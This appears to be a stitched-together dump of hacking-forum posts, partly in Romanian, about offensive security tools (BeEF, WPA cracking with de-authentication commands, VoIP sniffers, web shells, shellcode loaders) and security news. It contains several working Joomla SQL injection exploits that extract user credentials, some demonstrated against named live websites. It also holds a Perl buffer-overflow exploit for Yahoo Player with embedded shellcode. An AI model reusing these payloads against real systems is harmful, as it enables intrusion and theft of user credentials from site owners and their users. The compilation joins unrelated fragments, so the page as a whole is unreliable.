begood

This is a client/server framework that wraps around a slightly modified version of John The Ripper. In contrast to the MPI version of John, dnetj allows the use of nodes which are of differing speeds and for nodes which do not run 24/7. This tool was written for a number of reasons, firstly the MPI version requires an MPI installation on each node, and for the nodes to be configured together and be roughly the same speed. Also, although other distributed password crackers exist (such as djohn or medussa) they all have their own limitations. The server loads a set of password hashes, and splits the available keyspace into "work units" of a configurable size. The clients connect and retrieve the hashes, as well as a set of work units to process. Once a client has processed some work units, it connects back to the server to submit the completed units as well as any passwords which have been cracked. Possible uses include eg, running as a background task on all the workstations in an office. Note, this tool is at an early stage of development and is likely to be very buggy, although it is functional. Bug reports and/or patches are strongly encouraged. Developer John Anderson Mailing List There is a mailing list for Dnetj available, you can subscribe to it by writing a mail containing the word "subscribe" in the body of the mail, and sending it to john-mpi-subscribe@bindshell.net. As this list is currently fairly low traffic, it is shared with the john-mpi list. Support For support queries relating to dnetj, please use the mailing list. Do not contact the original authors of John The Ripper or use the public mailing lists on openwall.com for issues which are specific to the modified versions. Supported Platforms Dnetj has been tested on the following systems: * Linux/x86 * Linux/amd64 * Linux/sparc * MacOSX/PPC * MacOSX/Intel * Solaris/x86 Features * Distributed client/server model, any number of clients can be supported and can be brought up and down at will * Support for any cipher supported by John 1.7.2 (additional cipher patches should be able to be applied normally) * Keep the changes to John to a minimum, so that patches/updates can still be applied without too much fuss * Uses the same optimized encryption routines as John * Cracked hashes are stored in the standard john.pot format, so they can be displayed with john -show * Passwd files sent to clients are sanitised (only the hash is sent, other fields from the passwd file are removed) * Capability for auto client registration * Code is intentionally kept clean to aid porting Changes * 0.2.5 - Initial public release Known Issues * Clients will sometimes crash if unable to connect to the server for a long period of time. * Work unit size is limited to a 32bit integer number of crypts (ie: 4294967296) * Node performance calculations wrap once the node has performed more than 4294967296 crypts, so nodes may appear to be much slower than they truly are. * Doesn't work with NTLM, as the NTLM hash is stored in a different field of the passwd file. * Traffic is sent in plain text (this makes debugging easier at this early stage of development) * Makefile is very basic, and has no configure script, compilation on Solaris requires adding -lnsl -lsocket to the compile command. Download Latest Version * dnetj-0.2.5.tar.gz (md5sum: 88a0270ef8579e977c77c1d73df5b702) Download pre-compiled versions None yet, if you'd like precompiled versions please let me know at the address above. Documentation There is currently a rudimentary "INSTALL" file located in the distribution archive. Better documentation will follow. In the meantime, please feel free to email for assistance. Currently the client/server must be compiled seperately from the bundled version of John. The sourcecode to John is located in the src directory, and this can be compiled in the same way John is normally compiled. One caveat is that for a Dnetj server installation, the Makefile needs to be edited and -DMASTER added to the CFLAGS line. The client/server source is located in the "dist" subdirectory, and can be compiled with a simple "make". This will create 2 binaries, "client" and "server". The client or server binary should be moved to the "run" subdirectory, alongside the john binary. Also copy the file conf or conf-client into the run directory and edit it accordingly, most of the options within the configuration file are self explanatory or explained by comments. To execute, start either the client or server with it's corresponding configuration file as the first argument, eg: ./server conf ./client conf-client BindShell.Net: Dnetj

Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine. After noting potential security issues with the gadgets in Google Wave, I set about to finally setup a BeEF testbed and see if Google Wave was as capable a platform for malware delivery as I suspected. The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed – imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.) What’s even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim’s machine. I do not currently have Metasploit setup to test using Autopwn, but based on my experiences so far, I’m fairly confident such an attack would succeed. All of these demonstrations about security and Google Wave point to four general weaknesses in Wave’s current structure: 1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing 2. Lack of control over what content or users can be added to a wave 3. No simple mechanism for verifying gadget sources or features 4. Automatically loading gadgets when a wave is viewed Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave. Whatever may be said about Google Wave’s usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed. More info : Google Wave as a Tool for Hacking | Social Hacking More info on BeEF (rstcenter.com) : http://rstcenter.com/forum/20971-beef-browser-exploitation-framework.rst

BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers. Enhancements in the latest version include: * Integration with Metasploit via XMLRPC * Mozilla extension exploitation support * New browser functionality detection modules * Tiered logging for module actions and results BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include metasploit, port scanning, keylogging, TOR detection and more. download http://www.bindshell.net/tools/beef/beef-latest.tar.gz (rst) videotutorial : http://rstcenter.com/forum/20974-browser-exploitation-framework-beef.rst

By now, pretty much everyone has heard that it is easy to hack into WEP protected networks. As we have seen in our Cracking WEP article, it is terribly easy. (There have been advances in cracking WEP since that article was published, it is even easier now) Yeah, WiFi is inherently insecure, but we need it... Right? Well if you ask your local security guy how you can protect your home WiFi network, surely they will come back and say: "WPA or WPA2 cannot be cracked, use it". They are wrong. By simply installing a patch to your existing hardware, WPA came in as the "Saving Grace" for wireless networking. It corrected almost every security problem either created or ignored by WEP. However, WPA was not perfect. The method in which WPA initializes its encryption scheme is subject to capture and offline brute force attacks. Consequently, it's actually easier to crack WPA which uses a weak password than it is to crack WEP. This article will walk you through the process of retreiving and cracking a WPA network key. In this guide I will skim over some of the powerful things that you can do with graphics cards. By focusing on my personal setup, you will see it can be done with limited off the shelf equipment. The first decision is to decide what you want your setup to be. I personally chose to go with a setup using GeForce card with CUDA support (CUDA GPUs ). You will need to check on the programs you want to use to make sure that they support the graphics card that you choose. The setup I ultimately decided going with is an EVGA 780i motherboard that has dual SLI support (can support tri SLI). I ended up going with two GeForce GTX260 cards to utilize the SLI capability. I also upgraded my power supply to a Corsair 850W to power everything in my machine. After building the setup, feel free to go play some games, then come back to this guide. I mean you have work to do! The BackTrack 4 Pre-Release is a perfect platform for you to have some fun with your new setup. For a guide on configuring Backtrack 4 with CUDA and a in depth tutorial on CUDA tools, check out this 25 page guide on it by Pureh@te on the offensive-security website. Finally lets take a look at my favorite GPU tool Pyrit, which will allow you to run a pass-through dictionary attack against WPA encryption (pyrit - Project Hosting on Google Code) running it through coWPatty (coWPAtty - Attacking WPA/WPA2-PSK Exchanges). Using this you can take a capture file with a WPA 4-way handshake and do a pass-through to try to crack it with your dictionary using coWPatty. Make sure you use a dictionary with words in length starting from 8 and ending in 63 letters long. Any longer or shorter is just a waste because of the requirements of WPA passphrase's. One thing to keep in mind is that to be able to crack the passphrase you must have the passphrase in your dictionary file. The first step will be to put your card into monitor mode. After that, fire up airodump. I happen to know the router BSSID and channel so here is what I did below. airodump-ng -c (routers channel) - - bssid (routers bssid) -w (cap filename) interface Airodump will then load up as shown below. You can see the router and data coming from it. You can see a client is connected, which is important since you will need to get the 4-way handshake to crack the WPA passphrase. Next it is time to send a de-authentication packet to the client to make it reconnect to the router allowing you to grab that 4-way handshake. Aireplay-ng -0 (de-authentication attack) 5 (number of de-authentication packets to send) -a (router bssid) -c (client essid) interface If all goes well, you will see in your airodump window in top right corner showing you have received a WPA handshake. I have circled it in red below. If you don't see this just repeat the last step and de-authenticate the client again. After that I like to make sure that my graphic cards are working properly. You can either run a benchmark or list cores in pyrit. In the below picture I show the benchmark option To run benchmark: pyrit benchmark To list cores: pyrit list_cores Below is the command for running pyrit in a pass-through mode through coWPatty. The great thing about this is you can run it with your dictionary file and not mess around with making a rainbow table or anything. If you do not have a dictionary file for WPA, you can grab one from the backtrack repository. Command is as follows for the pass-through mode. pyrit -e (router essid) -f (path to the dictionary file) passthrough | (path to coWPatty) -d - -s (router essid) -r (name of capture file) Note: I had installed the latest version of coWPatty manually. The default location you would put after the pipe (|) in backtrack would be /pentest/wireless/cowpatty/cowpatty If all goes well you well, you will start to see it go through passphrases in your dictionary file as shown below. It was able to run 15,479.28 passphrases per second, which is an amazing upgrade from the 300 something I was getting with my 2.0 GHz dual core processor. This is also using the stock graphic cards that are not over-clocked. Credits: Tools used: Backtrack - http://www.remote-exploit.org/backtrack.html Pyrit- pyrit - Project Hosting on Google Code Cowpatty- coWPAtty - Attacking WPA/WPA2-PSK Exchanges Special thanks to Pureh@te /Offensive Security for the great guide on getting graphic cards set up in backtrack - http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf Last Updated ( Tuesday, 04 August 2009 )

http://www.matriux.com/images/wallpapers/matriux-wp01.png http://www.matriux.com/images/wallpapers/matriux-wp02.jpg http://www.matriux.com/images/wallpapers/matriux-wp03.jpg http://www.matriux.com/images/wallpapers/matriux-wp04.jpg http://www.matriux.com/images/wallpapers/matriux-wp05.jpg http://www.matriux.com/images/wallpapers/matriux-wp06.jpg http://www.matriux.com/images/wallpapers/matriux-wp07.jpg http://www.matriux.com/images/wallpapers/matriux-wp08.jpg http://www.matriux.com/images/wallpapers/matriux-wp09.jpg http://www.matriux.com/images/wallpapers/matriux-wp10.jpg http://www.matriux.com/images/wallpapers/matriux-wp11.jpg http://www.matriux.com/images/wallpapers/matriux-wp12.jpg The Matriux is a phenomenon that was waiting to happen. It is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software into your hardisk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval. The Matriux Arsenal contains a huge collection of the most powerful and versatile security and penetration testing tools. The Matriux Arsenal includes the following tool / utilities / libraries (The ßeta release will contain only few of the listed tools): - Reconnaissance - DNS * DIG * DNSBruteForce * DNSTracer * DNSWalk - HTTrack * HTTrack * WebHTTrack Website Copier * Browse Mirrored Websites * Chaosreader * Deepmagic Information Gathering Tool * dsniff password sniffer * EtherApe * tcpdump * tcpslice * tcptrace * tcptracert * Network Analyzer (Wireshark) * xtrace - Scanning - BATMAN-Tools * batping * batroute * batdump - Cisco * CDP Packet Generator * HSRP Generator - Routing-Protocols * Autonomous System Scanner * IGRP Route Injector - Web-Scanners * Nikto * Angry IP Scan * CryptCat * ettercap console * Ettercap Gui * file2cable * Web Server Fingerprinting Tool * icmpush * icmpquery * IRDP Packet Sender * IRDP Responder Packet Sender * Netcat * netenum * netmask * Nmap * Paris Traceroute * Protocol Scanner * Parallel Internet Measurement Utility * tctrace * THC-Amap * The Network Mapper Front End - Gain Access (Attack Tools) - Brute-Force * BruteSSH - Password * crunch * md5-utils * Mac Changer - Framework - Fast-Track * Fast Track Console Mode * FT-Interactive Menu * Fast Track Gui - Inguma * Inguma-cli * Inguma-gui - Metaspolit Framework 2 * msf2-cli * msf2-console * msf2-update * msf2-web * msf2-web console v2.7. + Metaspolit Framework 3 * msf3-cli * msf3-console * msf3-gui * msf3-web * msf3-web console v3.2 * Grendel-Scan * HTTP Request Exploit Framework * WebSecurify * WSFuzzer - Radio - Bluetooth * haraldscan - Wireless 802.11 * airbase-ng * aircrack-ng * airdecap-ng * airdecloak-ng * airdriver-ng * aireplay-ng * airmon-ng * airodump-ng * airolib-ng * airserv-ng * airtun-ng * buddy-ng * easside-ng * packetforge-ng * tkiptun-ng * wesside-ng * WiFi Radar - Digital-Forensics - Acquisition * Automated Image & Restore 1.28 * Guymager - Analysis * Start Autopsy * Autopsy Forensics Browser * Gpart * Pasco * Vinetto * Start WarVOX * Open WarVOX Web Interface * Xplico Console Mode (Internet Traffic Decoder) * Xplico Web Interface (Internet Traffic Decoder) * Dhash - Debugger * Crash * e2dbg * efence * JavaScript Lint * valgrind - Tracer + Leak-Tracer * Leak Analyze * Leak Check * etrace * ltrace * pstack * strace And more ... Minimum System Requirements And dont throw your old computers. Matriux can turn it into a powerful system. The minimum system requirements for running a Matriux lite edition: * Intel-compatible CPU (i486 or later) * 32 MB of RAM for text mode, at least 96 MB for graphics mode with KDE (128 MB of RAM is recommended to use the various office products) * bootable CD-ROM drive, or a boot floppy and standard CD-ROM (IDE/ATAPI or SCSI) * standard SVGA-compatible graphics card * serial or PS/2 standard mouse or IMPS/2-compatible USB-mouse Downloads Details * Matriux "Lithium" 0.9.4 - beta1 (2009.11.27) :: [ md5=f200b17d4f9ba97672516dbeaf13f533 ] o Mirrors: Temporary - iXsplit o Torrents: isoHunt

# Title : Joomla Component com_party SQL Injection Vulnerability # Author: DevilZ TM # Data : 2010-03-14 [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_party SQL Injection Vulnerability [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #################################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=[SQL] [~] ExploiT : -1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/* [~] Example : http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/* [~] Demo : http://www.bollywoodvillage.com/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/* [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS [~] IRANIAN Young HackerZ [~]######################################## FinisH #################################################[~]

3c362e6cffb1716902544ae975b04d16 # Title : Joomla Component com_color SQL Injection Vulnerability # Author: DevilZ TM # Data : 2010-03-14 [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_color SQL Injection Vulnerability [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #################################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_color&view=color&l=[SQL] [~] ExploiT : -1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/* [~] Example : http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/* [~] Demo : http://sudokugame.altervista.org/index.php?option=com_color&view=color&l=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0xa,password),6,7,8/**/FROM/**/jos_users/* [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS [~] IRANIAN Young HackerZ [~]######################################## FinisH #################################################[~]

3c2bc1bbd54f4f9e4464b14d056dc94a # Title : Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability # Date : 2010-03-11 # Author : N2n-Hacker # Script: [Joomla]-- # Founder: [ N2n-Hacker -- Email:2nd@live.fr<mailto:Email%3A2nd@live.fr> ]-- ============================================================================== \\\\\\\\\\ Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// ============================================================================== *************************************************************************** Dork = inurl:com_products "intCategoryId" ########################################################################### ===[ Exploit ]=== => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details or => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details ########################################################################### My Bad Life ###########################################################################

VideoJak is the industry’s first tool for simulating denial-of-service (DoS) attacks that can disrupt IP video communications in today’s leading edge Unified Communications deployments. VideoJak illustrates how an attacker can launch a targeted DoS attack that flies under the radar of typical security measures, interfering with only the communications stream associated with the video traffic. A sister tool to UCSniff, VideoJak lists the following features: * Automatic VLAN Hop and VLAN Discovery * MitM ARP Poisoning * Interception of SCCP Video signaling messages * Selection of IP Video calls from multiple calls in progress using a menu interface * Automatic creation of custom Video payload based on private IP Video call * Targeted DoS against specific IP Video phone / extension during a call session » Download VideoJak VideoJak: Hi Jacking IP Video Systems

UCSniff 2.0 breaks new ground in open source security assessment tools with the introduction of the industry’s first IP video security assessment features. Like the original UCSniff, UCSniff enables IT managers and security practitioners to test their UC infrastructure for vulnerabilities that can lead to the unauthorized interception and recording of UC traffic, or targeted eavesdropping. Written in C, and initially released for Linux systems, the software is freely available for anyone to download, under the GPLv3 license. * Extends UCSniff’s targeted user eavesdropping functionality to encompass IP video communications, including phone-to-phone video conferencing * Support for SCCP and RFC 3261 SIP * Automatic decode and re-construction of H.264 video codec * Automatically captures and saves video conference, into two separate AVI format video files, so that the security professional can see what both end users of the Video conference see * Reconstructs entire voice conversation into a separate, single WAV file format file The existing features of UCSniff have been further tested and improved upon, including several bug fixes * In Learning mode, dynamically updates the IP address of phone in the event that IP address changes after phone reboot or via DHCP * Allows targeting of VoIP users based on corporate directory and/or extensions * Tracking, interception, and logging of signaling messages used for authentication to voice mail systems * Automatically captures and saves entire voice conversations to a single file that can be played back by media players * Support for G.722 and g.711 u-law compression codecs * Automated VLAN Hop and VLAN Discovery support * A VoIP Sniffer combined with a MitM redirection tool * Monitor Mode (like Wireshark) * Sniffs entire conversation even if only one phone is in source VLAN * Enhanced capability to ARP Poison hosts that have Gratuitous ARP Disabled » Download UCSniff 2.0 UCSniff IP Video Sniffer

About four months ago I developed a reliable exploit for vulnerability CVE-2008-3531, which is also addressed in the advisory FreeBSD-SA-08:08.nmount. In this post I will use this vulnerability to provide an overview of the development process for FreeBSD kernel stack exploits. CVE-2008-3531 is a kernel stack overflow vulnerability that affects FreeBSD versions 7.0-RELEASE and 7.0-STABLE, but not 7.1-RELEASE nor 7.1-STABLE as the CVE entry seems to suggest. read it all here : CVE-2008-3531: FreeBSD kernel stack overflow exploit development argp's blog

The takedown of 100 servers used to control Zeus-related botnets may be a short-lived victory, security researchers said after discovering that about one-third of the orphaned channels were able to regain connectivity in less than 48 hours. The resurrection of at least 30 command and control channels came after their internet service provider found a new upstream provider to provide connectivity to the outside world, autonomous system records showed on Thursday. As a result, some of the rogue customers who used the Troyak ISP to herd huge numbers of infected PCs were able to once again connect to the compromised machines and issue commands. "The problem is that as soon the C&Cs are reachable from the internet again, the cybercriminals can regain the control of their botnet and can safely move the stolen data away from those AS's to a safer place or to a backup server," a researcher connected to the Zeus Tracker service told The Register. "Very bad." One example of a severed server that was able to reconnect was this one. In all, about 100 of the 249 C&C servers Zeus Tracker monitored lost connectivity. Since then, 30 have been able to reconnect. The researcher, who asked not to be identified by name, said he expected more of the malicious servers will reconnect over time. The resurrections are in many cases the result of Troyak being reconnected by upstream provider RTCOMM-AS of Moscow. As previously reported, Troyak was completely severed from the net when its previous providers, Ukraine-based Ihome and Russia-based Oversun Mercury, suddenly "de-peered" their customer. Troyak's resiliency demonstrates the whack-a-mole nature of internet takedowns, in which alleged bad guys are able to quickly come back online by switching to a new provider. For their part, Troyak principals characterized the de-peering as the result of an inadvertent failure to pay bills on time, rather than a termination based on the customers it served. "We will provide more attention to the payment for our upstreams in time," Roman Starchenko, wrote in an email to The Register. "I know, some of clients of our service might be used for something you called 'botnet'. Anyway, we did not receive any letter from any officials of our country, so will not perform any actions as our law said." ® source

replace with your own shellcode. or just plain fuckin google.

oare de ce nimic nu-i perfect? poate au introdus "ei" o vulnerabilitate ? (paranoia^ ; srsly, they're just plain stupid.)

# Title: Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH) # EDB-ID: 11647 # CVE-ID: () # OSVDB-ID: () # Author: Mr.tro0oqy # Published: 2010-03-07 # Verified: yes # Download Vulnerable app #!/usr/bin/perl print qq ( ################################################################ #Yahoo Player 1.0 (.m3u/.pls/.ypl) Local Buffer Overflow Exploit (SEH) #by Mr.tro0oqy from yemen #geertz: Red-D3v1L , his0k4 ,Stack ################################################################ ); my $bof="\x41" x 2076; my $nsh="\xEB\x06\x90\x90"; #Short jmp my $seh="\x5D\x38\x82\x7C"; #KERNEL32.DLL my $nop="\x90" x 20; my $sec= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". "\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". "\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". "\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". "\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". "\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". "\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". "\x4e\x56\x43\x46\x42\x30\x5a"; print $bof.$nsh.$seh.$nop.$sec; ################################################################### open(myfile,'>> tro0oqy.m3u'); print myfile $bof.$nsh.$seh.$nop.$sec; ###################################################################

data viitoare specifica de la inceput, nu fa pe desteptu daca te ajuta lumea.

old news btw exista si RSA-2048 so..

PayPal has finally made good on its pledge to restore Cryptome's account many hours after the firm's head of global communications told Register readers it had already done so. PayPal told operator John Young the account had been suspended because of its stated policy: Cryptome welcomes documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance -- open, secret and classified documents -- but not limited to those. Documents are removed from this site only by order served directly by a US court having jurisdiction. No court order has ever been served; any order served will be published here -- or elsewhere if gagged by order. Bluffs will be published if comical but otherwise ignored. Cryptome predates Wikileaks by a decade. PayPal told Young the restrictions would continue, with Cryptome unable to withdraw funds or close the account. Earlier PayPal's head of global communications had implied in an email to El Reg that Cryptome breached its policy that an account not be used "to encourage, promote, facilitate or instruct" others to engage in illegal activity. The email also stated the account had been restored. It hadn't. Eventually, some nine hours after contacting Cryptome, PayPal did restore the account, "after review". "Likely another PayPal ploy, hoping the FU will just go away, without apology, without admission of stupidity, declaring everything was done as it should have been, according to the arrogant rules of Microsoft, et al," wrote Young. There's more on the Cryptome site, including correspondence. ® source: theregister.co.uk

Cookie Monster is a cookie analysis tool written in Python. Cookie Monster will grab cookies from a host and assign each character a number. This number can be used to perform mathematical calculations on the differences in order to find a pattern and see if cookie prediction is possible. http://packetstormsecurity.org/web/cookiemonster_v1.6.zip

la ce viteza maxima ?

This page can help you generate a small piece of JavaScript that performs a heapspray. The heap spray uses the provided target address as the value to spray the heap with (eg. 0x01020304 means spray with "04 03 02 01 04 03 02 01 etc...". You can choose which browser you are targeting, which is needed to determines the size of the header for heap blocks (you can also manually enter this size). Finally you can provide a shellcode to put at the end of each nopslide. The default shellcode is one that executes calc.exe. Skypher

Everyone and their dog seems to want to use download and execute shellcode in their exploits. Even though this has some drawbacks: * You need to create an .exe file on the system, which will very likely draw unwanted attention. * You cannot use an API that downloads your file to a temporary location, because that will likely not retain the .exe extention. * You need to make an assumption about where a safe place is to write your .exe file, which means you can guess wrong and the code fails. * You need to store the string ‘.exe’ in the download & execute shellcode, which means this is 4 bytes larger. * You need to spawn an extra process, which will very likely draw attention. * You leave cleaning up the exploited process to the download & execute shellcode, which means this needs to be larger. To get around these problems, I created download and LoadLibrary shellcode: a shellcode that will download a DLL file to a temporary file and load it into the exploited process using LoadLibrary. The benefits of this approach are: * Smaller code. * You can use the URLDownloadToCacheFileA API function in urlmon that downloads and saves your DLL to a temporary file, meaning you do not need to provide a location. * No need to create an .exe file on the system: the extention of a DLL is irrelevant. * No need to spawn an extra process. * You can clean up the exploited process from the code in the DLL instead of the shellcode. The size of the final shellcode depends on the length of the URL for your DLL. For most recent version of the code it is 138 bytes + the length of the URL. This is a pretty decent reduction from the average download and execute shellcodes of 200+ bytes (excluding the URL) that I found around the interwebs. Project homepage: w32-dl-loadlib-shellcode - Project Hosting on Google Code source

Today I am releasing another old project called ASPsh. The goal of this project was to create an ASP page that can be used on a server to provide a “command line shell”-like experience when opening the page in a webbrowser. It also allows up- and downloading of files to and from the server. I hope the screen shot below explains what that means. Source code can be found here. Skypher

Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin. Plecost retrieves the information contained on Web sites supported by Wordpress, and also allows a search on the results indexed by Google. We can also call it a word press vulnerability scanner If we are about to perform penetration testing on many webservers and we know there are many web application running on wordpress Plecost will do the rest of the work give us the CVE no. and we and try to exploit. How to use ./plecost-0.2.2-7-beta.py [options] [ URL | [-l num] -G]rn sample plecost -R plugins.txt -n 5 plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example1234.com plecost -i plugin_list.txt -s 12 -M 30 -o results.txt www.example1234.com ( Search plugins with sleep time between 12 and 30 seconds for www.example1234.com ) Operating system supported It is perl script so only dependency is perl modules should be installed. download plecost

75053d91412433bd2af46e8bc384850d ============================================================================== [?] Joomla com_about Remote Sql Injection Vulnerability ============================================================================== [?] Script: [Joomla] [?] Language: [ PHP ] [?] Founder: [ Snakespc Email:s-c-dz@hotmail.com - Site:sec-war.com/cc> ] [?] Greetz to:[ His0k4 sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] ########################################################################### ===[ Exploit ]=== [?] http://server/index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- [?]Author: Snakespc <- ###########################################################################